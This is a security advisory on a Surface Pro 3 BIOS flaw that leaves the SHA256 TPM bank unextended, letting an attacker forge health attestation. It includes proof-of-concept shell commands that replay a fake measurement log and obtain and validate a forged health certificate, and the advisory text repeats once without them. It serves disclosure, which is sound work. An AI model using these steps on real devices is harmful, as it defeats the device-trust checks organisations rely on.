On affected Surface Pro 3 BIOS versions, when both SHA1 and SHA256 PCR banks are enabled, the SHA256 bank is not extended. This allows an adversary to falsify TPM-based health attestation by extending fake measurements into the TPM and getting a valid quote over the fake measurements.
HIGH - An adversary running on an affected BIOS can falsely attest any desired health attestation it wants, including a state corresponding to a "fixed" BIOS.
Proof of Concept
# Extend the fake log
sudo dhatool --log=path/to/log/file --bank=sha256 replay
# Self test
sudo attest-tool --log=path/to/log/file self-test
# Get AIK cert
sudo akcli
# Fetch a health cert
sudo dhatool --log=path/to/log/file --bank=sha256 --aik=path/to/aik getcert
# Validate the health cert against DHA with the current time as a nonce
NONCE=$(echo "obase=16; $(date +%s%N)" | bc); echo ${NONCE}
# normally the MDM generates a nonce, asks the device for claims and then validates against DHA
sudo dhatool --cert-path/to/healthcert --bank=sha256 --aik=path/to/aik --nonce=$NONCE validate
Further Analysis
For more information, see
Date reported: To Microsoft: 2021-05-26; to AMI: 2021-05-26; to TianoCore: 2021-07-19
Date fixed: In TianoCore: 2021-07-29
Date disclosed: 2021-10-18
On affected Surface Pro 3 BIOS versions, when both SHA1 and SHA256 PCR banks are enabled, the SHA256 bank is not extended. This allows an adversary to falsify TPM-based health attestation by extending fake measurements into the TPM and getting a valid quote over the fake measurements.
HIGH - An adversary running on an affected BIOS can falsely attest any desired health attestation it wants, including a state corresponding to a "fixed" BIOS.
Proof of Concept
Further Analysis
For more information, see
Date reported: To Microsoft: 2021-05-26; to AMI: 2021-05-26; to TianoCore: 2021-07-19
Date fixed: In TianoCore: 2021-07-29
Date disclosed: 2021-10-18